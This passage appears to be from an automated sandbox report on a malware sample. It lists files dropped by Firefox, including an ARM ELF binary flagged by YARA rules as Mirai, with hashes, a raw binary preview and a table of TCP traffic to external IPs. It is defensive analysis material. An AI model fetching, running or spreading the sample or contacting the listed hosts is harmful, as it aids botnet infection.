                                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                                    Preview:7....-...........Z2<. ....]...T..........Z2<. ..Oz..v4!..... ......l...e...........n.........S.v.....`...n.l...*.........,.D...j...F...~.......>.....N..............................................................................R..2~..0nbjo0tfbsdi.dpogjh.nbjo0tfbsdi.dpogjh.0f:9d774e.519e.5:12.:777.77f78b4195c5\..D~....nbjo0tfbsdi.dpogjh...w .....nbjo0tfbsdi.dpogjh.0d61edd98.12:3.5572.cc99.28b66cb292d8R..2~..0nbjo0tfbsdi.dpogjh.nbjo0tfbsdi.dpogjh.0d61edd98.12:3.5572.cc99.28b66cb292d8\..D~....nbjo0tfbsdi.dpogjh...w .....nbjo0tfbsdi.dpogjh.0g6:geecd.691c.5783.:deb.43:52dffd83:R..2~..0nbjo0tfbsdi.dpogjh.nbjo0tfbsdi.dpogjh.0g6:geecd.691c.5783.:deb.43:52dffd83:\..D~....nbjo0tfbsdi.dpogjh...w .....nbjo0tfbsdi.dpogjh.0f1db5:75.f435.55f8.91c7.27b942817e28R..2~..0nbjo0tfbsdi.dpogjh.nbjo0tfbsdi.dpogjh.0f1db5:75.f435.55f8.91c7.27b94...._..F......nbjo0qbttxpse.svmft...w..s2.nbjo0qbttxpse.svmft.0cg9f6958.c121.534f.:679.f2ed88g9g319...._..F......nbjo0qbttxpse.svmft...w..s*`.nbjo0qbttxpse.svmft.0113b

                                                                                                                                                                                                    /home/saturnino/.mozilla/firefox/a3xevaya.default-release/xulstore.json.tmp

                                                                                                                                                                                                    Download File
                                                                                                                                                                                                    Process:/usr/lib/firefox/firefox
                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):284
                                                                                                                                                                                                    Entropy (8bit):4.714849738109984
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:6:YGNTG/SJ8KgfQYV2fVH8qLvrdpUhj2xJWl42xJEAUvEJBf1:YGNd5gfV2tH8avrnQ2fZ2feUt
                                                                                                                                                                                                    MD5:B06BC06049AF495E7CFDE894BBFF29D5
                                                                                                                                                                                                    SHA1:3C0072F430EFB22CB74C0FF0906C566E2EA62CB6
                                                                                                                                                                                                    SHA-256:8CDE38A2164394A6943A1CFD1B7A6A1AEB3A78644BFE2A100BBF9FBFBFFDB57E
                                                                                                                                                                                                    SHA-512:B50FF6B6AC43831A182B0C98E07FFFF7AD176A2C095FEF28FC5D914694A1B42C29EA78C31416082284AE420736D2B08F2052F43BAECF1651D737ADE8A9E33310
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                                    Preview:{"chrome://browser/content/browser.xhtml":{"main-window":{"sizemode":"maximized"},"sidebar-box":{"sidebarcommand":"","width":""},"sidebar-title":{"value":""}},"chrome://mozapps/content/downloads/unknownContentType.xhtml":{"unknownContentTypeWindow":{"screenX":"285","screenY":"206"}}}

                                                                                                                                                                                                    /proc/6302/gid_map

                                                                                                                                                                                                    Download File
                                                                                                                                                                                                    Process:/usr/lib/firefox/firefox
                                                                                                                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):11
                                                                                                                                                                                                    Entropy (8bit):1.4353713907745331
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:3:MVUGn:MCG
                                                                                                                                                                                                    MD5:54258652109C33FE06188083A3EC23F4
                                                                                                                                                                                                    SHA1:013EC30A95D66C56642C193613A829B746982601
                                                                                                                                                                                                    SHA-256:C459EBB6CF3917EFB05A2E72EF25E223BE9B78780B1CE0CAACCE49C773DF199E
                                                                                                                                                                                                    SHA-512:AAE8A67B91BDEC9C21ACD88711C262EA3ACD3EE086AEB27645531C47DD618708C7FF284759A68000414579B77C0D8A3449F95480D039A9901F7352121B7D78F0
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                                    Preview:1000 1000 1

                                                                                                                                                                                                    /proc/6302/setgroups

                                                                                                                                                                                                    Download File
                                                                                                                                                                                                    Process:/usr/lib/firefox/firefox
                                                                                                                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):4
                                                                                                                                                                                                    Entropy (8bit):2.0
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:3:9n:9n
                                                                                                                                                                                                    MD5:05AFB6CE69B9CEF1BD6ECE7E4745F96C
                                                                                                                                                                                                    SHA1:1D16DC2DCC6851208C1B981E2EC377250A4A0CC5
                                                                                                                                                                                                    SHA-256:3026A0CA485E5831657BA0120FA8DD66B3425427BFB0A2BE0DB743E2305CC7C5
                                                                                                                                                                                                    SHA-512:A37A7790CCB2FA5A3C3F2740480CF4035F2870502060F398A1882A44B675DE736E33D8ECD9B834BB3D19D807B46875E30AA835EDD847C5FE8F1F2942A870BAD5
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                                    Preview:deny

                                                                                                                                                                                                    /proc/6302/uid_map

                                                                                                                                                                                                    Download File
                                                                                                                                                                                                    Process:/usr/lib/firefox/firefox
                                                                                                                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):11
                                                                                                                                                                                                    Entropy (8bit):1.4353713907745331
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:3:MVUGn:MCG
                                                                                                                                                                                                    MD5:54258652109C33FE06188083A3EC23F4
                                                                                                                                                                                                    SHA1:013EC30A95D66C56642C193613A829B746982601
                                                                                                                                                                                                    SHA-256:C459EBB6CF3917EFB05A2E72EF25E223BE9B78780B1CE0CAACCE49C773DF199E
                                                                                                                                                                                                    SHA-512:AAE8A67B91BDEC9C21ACD88711C262EA3ACD3EE086AEB27645531C47DD618708C7FF284759A68000414579B77C0D8A3449F95480D039A9901F7352121B7D78F0
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                                    Preview:1000 1000 1

                                                                                                                                                                                                    /proc/6332/gid_map

                                                                                                                                                                                                    Download File
                                                                                                                                                                                                    Process:/usr/lib/firefox/firefox
                                                                                                                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):11
                                                                                                                                                                                                    Entropy (8bit):1.4353713907745331
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:3:MVUGn:MCG
                                                                                                                                                                                                    MD5:54258652109C33FE06188083A3EC23F4
                                                                                                                                                                                                    SHA1:013EC30A95D66C56642C193613A829B746982601
                                                                                                                                                                                                    SHA-256:C459EBB6CF3917EFB05A2E72EF25E223BE9B78780B1CE0CAACCE49C773DF199E
                                                                                                                                                                                                    SHA-512:AAE8A67B91BDEC9C21ACD88711C262EA3ACD3EE086AEB27645531C47DD618708C7FF284759A68000414579B77C0D8A3449F95480D039A9901F7352121B7D78F0
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                                    Preview:1000 1000 1

                                                                                                                                                                                                    /proc/6332/setgroups

                                                                                                                                                                                                    Download File
                                                                                                                                                                                                    Process:/usr/lib/firefox/firefox
                                                                                                                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):4
                                                                                                                                                                                                    Entropy (8bit):2.0
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:3:9n:9n
                                                                                                                                                                                                    MD5:05AFB6CE69B9CEF1BD6ECE7E4745F96C
                                                                                                                                                                                                    SHA1:1D16DC2DCC6851208C1B981E2EC377250A4A0CC5
                                                                                                                                                                                                    SHA-256:3026A0CA485E5831657BA0120FA8DD66B3425427BFB0A2BE0DB743E2305CC7C5
                                                                                                                                                                                                    SHA-512:A37A7790CCB2FA5A3C3F2740480CF4035F2870502060F398A1882A44B675DE736E33D8ECD9B834BB3D19D807B46875E30AA835EDD847C5FE8F1F2942A870BAD5
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                                    Preview:deny

                                                                                                                                                                                                    /proc/6332/uid_map

                                                                                                                                                                                                    Download File
                                                                                                                                                                                                    Process:/usr/lib/firefox/firefox
                                                                                                                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):11
                                                                                                                                                                                                    Entropy (8bit):1.4353713907745331
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:3:MVUGn:MCG
                                                                                                                                                                                                    MD5:54258652109C33FE06188083A3EC23F4
                                                                                                                                                                                                    SHA1:013EC30A95D66C56642C193613A829B746982601
                                                                                                                                                                                                    SHA-256:C459EBB6CF3917EFB05A2E72EF25E223BE9B78780B1CE0CAACCE49C773DF199E
                                                                                                                                                                                                    SHA-512:AAE8A67B91BDEC9C21ACD88711C262EA3ACD3EE086AEB27645531C47DD618708C7FF284759A68000414579B77C0D8A3449F95480D039A9901F7352121B7D78F0
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                                    Preview:1000 1000 1

                                                                                                                                                                                                    /proc/6390/gid_map

                                                                                                                                                                                                    Download File
                                                                                                                                                                                                    Process:/usr/lib/firefox/firefox
                                                                                                                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):11
                                                                                                                                                                                                    Entropy (8bit):1.4353713907745331
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:3:MVUGn:MCG
                                                                                                                                                                                                    MD5:54258652109C33FE06188083A3EC23F4
                                                                                                                                                                                                    SHA1:013EC30A95D66C56642C193613A829B746982601
                                                                                                                                                                                                    SHA-256:C459EBB6CF3917EFB05A2E72EF25E223BE9B78780B1CE0CAACCE49C773DF199E
                                                                                                                                                                                                    SHA-512:AAE8A67B91BDEC9C21ACD88711C262EA3ACD3EE086AEB27645531C47DD618708C7FF284759A68000414579B77C0D8A3449F95480D039A9901F7352121B7D78F0
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                                    Preview:1000 1000 1

                                                                                                                                                                                                    /proc/6390/setgroups

                                                                                                                                                                                                    Download File
                                                                                                                                                                                                    Process:/usr/lib/firefox/firefox
                                                                                                                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):4
                                                                                                                                                                                                    Entropy (8bit):2.0
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:3:9n:9n
                                                                                                                                                                                                    MD5:05AFB6CE69B9CEF1BD6ECE7E4745F96C
                                                                                                                                                                                                    SHA1:1D16DC2DCC6851208C1B981E2EC377250A4A0CC5
                                                                                                                                                                                                    SHA-256:3026A0CA485E5831657BA0120FA8DD66B3425427BFB0A2BE0DB743E2305CC7C5
                                                                                                                                                                                                    SHA-512:A37A7790CCB2FA5A3C3F2740480CF4035F2870502060F398A1882A44B675DE736E33D8ECD9B834BB3D19D807B46875E30AA835EDD847C5FE8F1F2942A870BAD5
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                                    Preview:deny

                                                                                                                                                                                                    /proc/6390/uid_map

                                                                                                                                                                                                    Download File
                                                                                                                                                                                                    Process:/usr/lib/firefox/firefox
                                                                                                                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):11
                                                                                                                                                                                                    Entropy (8bit):1.4353713907745331
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:3:MVUGn:MCG
                                                                                                                                                                                                    MD5:54258652109C33FE06188083A3EC23F4
                                                                                                                                                                                                    SHA1:013EC30A95D66C56642C193613A829B746982601
                                                                                                                                                                                                    SHA-256:C459EBB6CF3917EFB05A2E72EF25E223BE9B78780B1CE0CAACCE49C773DF199E
                                                                                                                                                                                                    SHA-512:AAE8A67B91BDEC9C21ACD88711C262EA3ACD3EE086AEB27645531C47DD618708C7FF284759A68000414579B77C0D8A3449F95480D039A9901F7352121B7D78F0
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                                    Preview:1000 1000 1

                                                                                                                                                                                                    /proc/6451/gid_map

                                                                                                                                                                                                    Download File
                                                                                                                                                                                                    Process:/usr/lib/firefox/firefox
                                                                                                                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):11
                                                                                                                                                                                                    Entropy (8bit):1.4353713907745331
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:3:MVUGn:MCG
                                                                                                                                                                                                    MD5:54258652109C33FE06188083A3EC23F4
                                                                                                                                                                                                    SHA1:013EC30A95D66C56642C193613A829B746982601
                                                                                                                                                                                                    SHA-256:C459EBB6CF3917EFB05A2E72EF25E223BE9B78780B1CE0CAACCE49C773DF199E
                                                                                                                                                                                                    SHA-512:AAE8A67B91BDEC9C21ACD88711C262EA3ACD3EE086AEB27645531C47DD618708C7FF284759A68000414579B77C0D8A3449F95480D039A9901F7352121B7D78F0
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                                    Preview:1000 1000 1

                                                                                                                                                                                                    /proc/6451/setgroups

                                                                                                                                                                                                    Download File
                                                                                                                                                                                                    Process:/usr/lib/firefox/firefox
                                                                                                                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):4
                                                                                                                                                                                                    Entropy (8bit):2.0
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:3:9n:9n
                                                                                                                                                                                                    MD5:05AFB6CE69B9CEF1BD6ECE7E4745F96C
                                                                                                                                                                                                    SHA1:1D16DC2DCC6851208C1B981E2EC377250A4A0CC5
                                                                                                                                                                                                    SHA-256:3026A0CA485E5831657BA0120FA8DD66B3425427BFB0A2BE0DB743E2305CC7C5
                                                                                                                                                                                                    SHA-512:A37A7790CCB2FA5A3C3F2740480CF4035F2870502060F398A1882A44B675DE736E33D8ECD9B834BB3D19D807B46875E30AA835EDD847C5FE8F1F2942A870BAD5
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                                    Preview:deny

                                                                                                                                                                                                    /proc/6451/uid_map

                                                                                                                                                                                                    Download File
                                                                                                                                                                                                    Process:/usr/lib/firefox/firefox
                                                                                                                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):11
                                                                                                                                                                                                    Entropy (8bit):1.4353713907745331
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:3:MVUGn:MCG
                                                                                                                                                                                                    MD5:54258652109C33FE06188083A3EC23F4
                                                                                                                                                                                                    SHA1:013EC30A95D66C56642C193613A829B746982601
                                                                                                                                                                                                    SHA-256:C459EBB6CF3917EFB05A2E72EF25E223BE9B78780B1CE0CAACCE49C773DF199E
                                                                                                                                                                                                    SHA-512:AAE8A67B91BDEC9C21ACD88711C262EA3ACD3EE086AEB27645531C47DD618708C7FF284759A68000414579B77C0D8A3449F95480D039A9901F7352121B7D78F0
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                                    Preview:1000 1000 1

                                                                                                                                                                                                    /tmp/mgmP_SRg.zip.part

                                                                                                                                                                                                    Download File
                                                                                                                                                                                                    Process:/usr/lib/firefox/firefox
                                                                                                                                                                                                    File Type:ELF 32-bit LSB executable, ARM, EABI4 version 1 (SYSV), statically linked, stripped
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):307960
                                                                                                                                                                                                    Entropy (8bit):5.819679405566689
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:6144:T2s/gAWuboqsJ9xcJxspJBqQgTuaJZRhVabE5wKSDP99zBa77oNsKqqfPqOJ:T2s/bW+UmJqBxAuaPRhVabEDSDP99zBT
                                                                                                                                                                                                    MD5:EEC5C6C219535FBA3A0492EA8118B397
                                                                                                                                                                                                    SHA1:292559E94F1C04B7D0C65D4A01BBBC5DC1FF6F21
                                                                                                                                                                                                    SHA-256:12013662C71DA69DE977C04CD7021F13A70CF7BED4CA6C82ACBC100464D4B0EF
                                                                                                                                                                                                    SHA-512:3482C8324A18302F0F37B6E23ED85F24FFF9F50BB568D8FD7461BF57F077A7C592F7A88BB2E1C398699958946D87BB93AB744D13A0003F9B879C15E6471F7400
                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                    Yara Hits:
                                                                                                                                                                                                    • Rule: JoeSecurity_Mirai_4, Description: Yara detected Mirai, Source: /tmp/mgmP_SRg.zip.part, Author: Joe Security
                                                                                                                                                                                                    • Rule: JoeSecurity_Mirai_9, Description: Yara detected Mirai, Source: /tmp/mgmP_SRg.zip.part, Author: Joe Security
                                                                                                                                                                                                    • Rule: JoeSecurity_Mirai_6, Description: Yara detected Mirai, Source: /tmp/mgmP_SRg.zip.part, Author: Joe Security
                                                                                                                                                                                                    • Rule: JoeSecurity_Mirai_8, Description: Yara detected Mirai, Source: /tmp/mgmP_SRg.zip.part, Author: Joe Security
                                                                                                                                                                                                    • Rule: Linux_Trojan_Mirai_5c62e6b2, Description: unknown, Source: /tmp/mgmP_SRg.zip.part, Author: unknown
                                                                                                                                                                                                    • Rule: Linux_Trojan_Mirai_77137320, Description: unknown, Source: /tmp/mgmP_SRg.zip.part, Author: unknown
                                                                                                                                                                                                    • Rule: Linux_Trojan_Mirai_ac253e4f, Description: unknown, Source: /tmp/mgmP_SRg.zip.part, Author: unknown
                                                                                                                                                                                                    Antivirus:
                                                                                                                                                                                                    • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 79%
                                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                                    Preview:.ELF..............(.........4...P.......4. ...(........p............(...(...............................................................8...........................................Q.td..................................-...L.................@-.,@...0....S..... 0....S........../..0...0...@..../.............-.@0....S...M.8...8......../.0....0....S.....$0....S....../........../................................. ... -...-.......-......0.....V..............O-..M..@....M..P....... ...0..............2............ .......0..N........`... ......P0..H.....X..H..$x..........Z~....P.....U......O..../...V....................Z.....4....`.......0... ...0... ..............2..1C......P... .......... ..~~...0....S......@..Ca......$,..!$...<.......$...,..0!......"<.. 4.......4...<...0..3a...9....."!...1...0....c...P...;.............p........+..0 ...p..$L... B.P....p...@... ..).H..........0.....<.......0.....0... ..(....S.. ..........(,..|0C..+...0......( ...S...........Z.....

                                                                                                                                                                                                    Static File Info

                                                                                                                                                                                                    No static file info

                                                                                                                                                                                                    Network Behavior

                                                                                                                                                                                                    Network Port Distribution

                                                                                                                                                                                                    TCP Packets

                                                                                                                                                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                    Dec 19, 2024 15:47:14.369807959 CET43928443192.168.2.2391.189.91.42
                                                                                                                                                                                                    Dec 19, 2024 15:47:20.000965118 CET42836443192.168.2.2391.189.91.43
                                                                                                                                                                                                    Dec 19, 2024 15:47:21.280765057 CET4251680192.168.2.23109.202.202.202
                                                                                                                                                                                                    Dec 19, 2024 15:47:34.234556913 CET3923440158192.168.2.23112.31.189.32
                                                                                                                                                                                                    Dec 19, 2024 15:47:34.354367971 CET4015839234112.31.189.32192.168.2.23
                                                                                                                                                                                                    Dec 19, 2024 15:47:34.354437113 CET3923440158192.168.2.23112.31.189.32
                                                                                                                                                                                                    Dec 19, 2024 15:47:34.595113039 CET43928443192.168.2.2391.189.91.42
                                                                                                                                                                                                    Dec 19, 2024 15:47:39.381633043 CET3923440158192.168.2.23112.31.189.32
                                                                                                                                                                                                    Dec 19, 2024 15:47:39.502036095 CET4015839234112.31.189.32192.168.2.23
                                                                                                                                                                                                    Dec 19, 2024 15:47:39.502089024 CET3923440158192.168.2.23112.31.189.32
                                                                                                                                                                                                    Dec 19, 2024 15:47:39.606976032 CET3923640158192.168.2.23112.31.189.32
                                                                                                                                                                                                    Dec 19, 2024 15:47:39.727231979 CET4015839236112.31.189.32192.168.2.23
                                                                                                                                                                                                    Dec 19, 2024 15:47:39.727325916 CET3923640158192.168.2.23112.31.189.32
                                                                                                                                                                                                    Dec 19, 2024 15:47:39.729543924 CET3923640158192.168.2.23112.31.189.32
                                                                                                                                                                                                    Dec 19, 2024 15:47:39.849886894 CET4015839236112.31.189.32192.168.2.23
                                                                                                                                                                                                    Dec 19, 2024 15:47:40.510248899 CET38694443192.168.2.2334.160.144.191
                                                                                                                                                                                                    Dec 19, 2024 15:47:40.510296106 CET4433869434.160.144.191192.168.2.23
                                                                                                                                                                                                    Dec 19, 2024 15:47:40.510349989 CET38694443192.168.2.2334.160.144.191
                                                                                                                                                                                                    Dec 19, 2024 15:47:40.514004946 CET38694443192.168.2.2334.160.144.191
                                                                                                                                                                                                    Dec 19, 2024 15:47:40.514018059 CET4433869434.160.144.191192.168.2.23
                                                                                                                                                                                                    Dec 19, 2024 15:47:41.395175934 CET4015839236112.31.189.32192.168.2.23
                                                                                                                                                                                                    Dec 19, 2024 15:47:41.395320892 CET4015839236112.31.189.32192.168.2.23
                                                                                                                                                                                                    Dec 19, 2024 15:47:41.395332098 CET4015839236112.31.189.32192.168.2.23
                                                                                                                                                                                                    Dec 19, 2024 15:47:41.395390987 CET3923640158192.168.2.23112.31.189.32
                                                                                                                                                                                                    Dec 19, 2024 15:47:41.395390987 CET3923640158192.168.2.23112.31.189.32
                                                                                                                                                                                                    Dec 19, 2024 15:47:41.395390987 CET3923640158192.168.2.23112.31.189.32
                                                                                                                                                                                                    Dec 19, 2024 15:47:41.395473003 CET4015839236112.31.189.32192.168.2.23
                                                                                                                                                                                                    Dec 19, 2024 15:47:41.395513058 CET3923640158192.168.2.23112.31.189.32
                                                                                                                                                                                                    Dec 19, 2024 15:47:41.395587921 CET4015839236112.31.189.32192.168.2.23
                                                                                                                                                                                                    Dec 19, 2024 15:47:41.395601034 CET4015839236112.31.189.32192.168.2.23
                                                                                                                                                                                                    Dec 19, 2024 15:47:41.395607948 CET4015839236112.31.189.32192.168.2.23
                                                                                                                                                                                                    Dec 19, 2024 15:47:41.395637035 CET3923640158192.168.2.23112.31.189.32
                                                                                                                                                                                                    Dec 19, 2024 15:47:41.395651102 CET3923640158192.168.2.23112.31.189.32
                                                                                                                                                                                                    Dec 19, 2024 15:47:41.395662069 CET3923640158192.168.2.23112.31.189.32
                                                                                                                                                                                                    Dec 19, 2024 15:47:41.395740032 CET4015839236112.31.189.32192.168.2.23
                                                                                                                                                                                                    Dec 19, 2024 15:47:41.395750999 CET4015839236112.31.189.32192.168.2.23
                                                                                                                                                                                                    Dec 19, 2024 15:47:41.395781040 CET3923640158192.168.2.23112.31.189.32
                                                                                                                                                                                                    Dec 19, 2024 15:47:41.395795107 CET3923640158192.168.2.23112.31.189.32
                                                                                                                                                                                                    Dec 19, 2024 15:47:41.395904064 CET4015839236112.31.189.32192.168.2.23
                                                                                                                                                                                                    Dec 19, 2024 15:47:41.395939112 CET3923640158192.168.2.23112.31.189.32
                                                                                                                                                                                                    Dec 19, 2024 15:47:41.515533924 CET4015839236112.31.189.32192.168.2.23
                                                                                                                                                                                                    Dec 19, 2024 15:47:41.515557051 CET4015839236112.31.189.32192.168.2.23
                                                                                                                                                                                                    Dec 19, 2024 15:47:41.515602112 CET3923640158192.168.2.23112.31.189.32
                                                                                                                                                                                                    Dec 19, 2024 15:47:41.515636921 CET3923640158192.168.2.23112.31.189.32
                                                                                                                                                                                                    Dec 19, 2024 15:47:41.519463062 CET4015839236112.31.189.32192.168.2.23
                                                                                                                                                                                                    Dec 19, 2024 15:47:41.519510984 CET3923640158192.168.2.23112.31.189.32
                                                                                                                                                                                                    Dec 19, 2024 15:47:41.519530058 CET4015839236112.31.189.32192.168.2.23
                                                                                                                                                                                                    Dec 19, 2024 15:47:41.519568920 CET3923640158192.168.2.23112.31.189.32
                                                                                                                                                                                                    Dec 19, 2024 15:47:41.688478947 CET4015839236112.31.189.32192.168.2.23
                                                                                                                                                                                                    Dec 19, 2024 15:47:41.688541889 CET3923640158192.168.2.23112.31.189.32
                                                                                                                                                                                                    Dec 19, 2024 15:47:41.688595057 CET4015839236112.31.189.32192.168.2.23
                                                                                                                                                                                                    Dec 19, 2024 15:47:41.688632011 CET3923640158192.168.2.23112.31.189.32
                                                                                                                                                                                                    Dec 19, 2024 15:47:41.691952944 CET4015839236112.31.189.32192.168.2.23
                                                                                                                                                                                                    Dec 19, 2024 15:47:41.692035913 CET3923640158192.168.2.23112.31.189.32
                                                                                                                                                                                                    Dec 19, 2024 15:47:41.693487883 CET4015839236112.31.189.32192.168.2.23
                                                                                                                                                                                                    Dec 19, 2024 15:47:41.693631887 CET4015839236112.31.189.32192.168.2.23
                                                                                                                                                                                                    Dec 19, 2024 15:47:41.693670034 CET3923640158192.168.2.23112.31.189.32
                                                                                                                                                                                                    Dec 19, 2024 15:47:41.700710058 CET4015839236112.31.189.32192.168.2.23
                                                                                                                                                                                                    Dec 19, 2024 15:47:41.700820923 CET4015839236112.31.189.32192.168.2.23
                                                                                                                                                                                                    Dec 19, 2024 15:47:41.700879097 CET3923640158192.168.2.23112.31.189.32
                                                                                                                                                                                                    Dec 19, 2024 15:47:41.707981110 CET4015839236112.31.189.32192.168.2.23
                                                                                                                                                                                                    Dec 19, 2024 15:47:41.708141088 CET4015839236112.31.189.32192.168.2.23
                                                                                                                                                                                                    Dec 19, 2024 15:47:41.708179951 CET3923640158192.168.2.23112.31.189.32
                                                                                                                                                                                                    Dec 19, 2024 15:47:41.715240955 CET4015839236112.31.189.32192.168.2.23
                                                                                                                                                                                                    Dec 19, 2024 15:47:41.715290070 CET4015839236112.31.189.32192.168.2.23
                                                                                                                                                                                                    Dec 19, 2024 15:47:41.715334892 CET3923640158192.168.2.23112.31.189.32
                                                                                                                                                                                                    Dec 19, 2024 15:47:41.722647905 CET4015839236112.31.189.32192.168.2.23
                                                                                                                                                                                                    Dec 19, 2024 15:47:41.722683907 CET4015839236112.31.189.32192.168.2.23
                                                                                                                                                                                                    Dec 19, 2024 15:47:41.722731113 CET3923640158192.168.2.23112.31.189.32
                                                                                                                                                                                                    Dec 19, 2024 15:47:41.730603933 CET4015839236112.31.189.32192.168.2.23
                                                                                                                                                                                                    Dec 19, 2024 15:47:41.730712891 CET4015839236112.31.189.32192.168.2.23
                                                                                                                                                                                                    Dec 19, 2024 15:47:41.730753899 CET3923640158192.168.2.23112.31.189.32
                                                                                                                                                                                                    Dec 19, 2024 15:47:41.737710953 CET4015839236112.31.189.32192.168.2.23
                                                                                                                                                                                                    Dec 19, 2024 15:47:41.737783909 CET4015839236112.31.189.32192.168.2.23
                                                                                                                                                                                                    Dec 19, 2024 15:47:41.737818003 CET3923640158192.168.2.23112.31.189.32
                                                                                                                                                                                                    Dec 19, 2024 15:47:41.743324041 CET4433869434.160.144.191192.168.2.23
                                                                                                                                                                                                    Dec 19, 2024 15:47:41.743393898 CET38694443192.168.2.2334.160.144.191
                                                                                                                                                                                                    Dec 19, 2024 15:47:41.744888067 CET4015839236112.31.189.32192.168.2.23
                                                                                                                                                                                                    Dec 19, 2024 15:47:41.745100975 CET4015839236112.31.189.32192.168.2.23
                                                                                                                                                                                                    Dec 19, 2024 15:47:41.751878977 CET4015839236112.31.189.32192.168.2.23
                                                                                                                                                                                                    Dec 19, 2024 15:47:41.751950026 CET4015839236112.31.189.32192.168.2.23
                                                                                                                                                                                                    Dec 19, 2024 15:47:41.758838892 CET4015839236112.31.189.32192.168.2.23
                                                                                                                                                                                                    Dec 19, 2024 15:47:41.758954048 CET4015839236112.31.189.32192.168.2.23
                                                                                                                                                                                                    Dec 19, 2024 15:47:41.765974045 CET4015839236112.31.189.32192.168.2.23
                                                                                                                                                                                                    Dec 19, 2024 15:47:41.785952091 CET3923640158192.168.2.23112.31.189.32
                                                                                                                                                                                                    Dec 19, 2024 15:47:41.888134956 CET4015839236112.31.189.32192.168.2.23
                                                                                                                                                                                                    Dec 19, 2024 15:47:41.888160944 CET4015839236112.31.189.32192.168.2.23
                                                                                                                                                                                                    Dec 19, 2024 15:47:41.949920893 CET3923640158192.168.2.23112.31.189.32
                                                                                                                                                                                                    Dec 19, 2024 15:47:41.981296062 CET4015839236112.31.189.32192.168.2.23
                                                                                                                                                                                                    Dec 19, 2024 15:47:41.981343985 CET4015839236112.31.189.32192.168.2.23
                                                                                                                                                                                                    Dec 19, 2024 15:47:41.983051062 CET4015839236112.31.189.32192.168.2.23
                                                                                                                                                                                                    Dec 19, 2024 15:47:41.983189106 CET4015839236112.31.189.32192.168.2.23
                                                                                                                                                                                                    Dec 19, 2024 15:47:41.990005970 CET4015839236112.31.189.32192.168.2.23
                                                                                                                                                                                                    Dec 19, 2024 15:47:41.990197897 CET4015839236112.31.189.32192.168.2.23
                                                                                                                                                                                                    Dec 19, 2024 15:47:41.995812893 CET4015839236112.31.189.32192.168.2.23
                                                                                                                                                                                                    Dec 19, 2024 15:47:41.995924950 CET4015839236112.31.189.32192.168.2.23
                                                                                                                                                                                                    Dec 19, 2024 15:47:42.002192020 CET4015839236112.31.189.32192.168.2.23
